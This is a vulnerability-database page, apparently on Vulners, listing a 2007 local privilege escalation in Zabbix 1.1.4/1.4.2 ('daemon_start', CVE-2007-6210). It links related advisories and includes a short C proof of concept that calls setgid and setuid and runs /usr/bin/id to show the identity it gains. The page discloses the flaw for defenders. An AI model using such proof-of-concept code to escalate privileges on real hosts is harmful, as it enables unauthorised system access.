Lucene search
+L

Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation

🗓️ 03 Dec 2007 00:00:00Reported by Bas van SchaikType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Zabbix Local Privilege Escalation Vulnerability in daemon_start Functio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-6210
4 Dec 200701:00
cve
cvelist
Cvelist
CVE-2007-6210
4 Dec 200701:00
cvelist
debian
Debian
[SECURITY] [DSA 1420-1] New zabbix packages fix privilege escalation
5 Dec 200719:14
debian
debian
Debian
[SECURITY] [DSA 1420-1] New zabbix packages fix privilege escalation
5 Dec 200719:14
debian
debiancve
Debian CVE
CVE-2007-6210
4 Dec 200701:00
debiancve
nessus
Tenable Nessus
Debian DSA-1420-1 : zabbix - programming error
7 Dec 200700:00
nessus
nessus
Tenable Nessus
Fedora 7 : zabbix-1.4.2-3.fc7 (2007-4160)
11 Dec 200700:00
nessus
nessus
Tenable Nessus
Fedora 8 : zabbix-1.4.2-4.fc8 (2007-4176)
11 Dec 200700:00
nessus
euvd
EUVD
EUVD-2007-6178
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-6210
4 Dec 200701:46
nvd
Rows per page
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>

int main()
{
     struct passwd *pw;
     pw = getpwnam("abi");
     FILE *pipe;
     char buf[25];
     setgid(pw->pw_gid);
     setuid(pw->pw_uid);

     printf("my gid: %d\n", getegid());
     printf("my uid: %d\n", getuid());

     pipe = popen("/usr/bin/id", "r");
     while (fgets(buf, sizeof buf, pipe)) {
             printf("%s", buf);
     }
     printf("\n");
     pclose(pipe);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00777
35